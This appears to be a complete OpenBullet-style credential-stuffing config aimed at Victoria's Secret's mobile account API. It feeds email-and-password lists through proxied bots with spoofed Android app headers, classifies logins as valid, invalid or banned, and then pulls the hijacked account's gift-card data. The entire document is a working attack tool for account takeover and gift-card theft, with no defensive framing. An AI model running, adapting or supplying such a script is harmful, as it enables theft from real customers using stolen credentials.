[SETTINGS]
{
  "Name": "Victorias Secret",
  "SuggestedBots": 50,
  "LastModified": "2018-06-07T00:46:50.5818306+00:00",
  "AdditionalInfo": "",
  "Author": "bra panties",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://www.victoriassecret.com/account/quicklogin" AutoRedirect=TRUE 
  CONTENT "{\"password\":\"<PASS>\",\"username\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "User-Agent: okhttp/3.8.0" 
  HEADER "Pragma: no-cache" 
  HEADER "VSAPPVERSION: 5.2.9.3" 
  HEADER "VSAPPTYPE: ANDROIDHANDHELD" 
  HEADER "deviceId: 9999999111199111" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "screenName" 
  KEYCHAIN Failure OR 
    KEY "We do not recognize" 
    KEY "isValid\":false" 
  KEYCHAIN Ban OR 
    KEY "Forbidden" 
FUNCTION Base64Encode "9999999111199111 com.victoriassecret.vsaa" -> VAR "BASE64HEAD" 
REQUEST GET "https://vsma.victoriassecret.com/payments/VS/v1/giftcard" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-G935F Build/LMY48Z) AppleWebKit/537.36 Version/4.0 Chrome/39.0.0.0 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "vsapptype: ANDROIDHANDHELD" 
  HEADER "appdeviceid: <BASE64HEAD>" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "CARDS_NOT_FOUND" 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" Contains "200" 
PARSE "<SOURCE>" LR "{" "}" Recursive=TRUE -> CAP "OUT" "" "" 
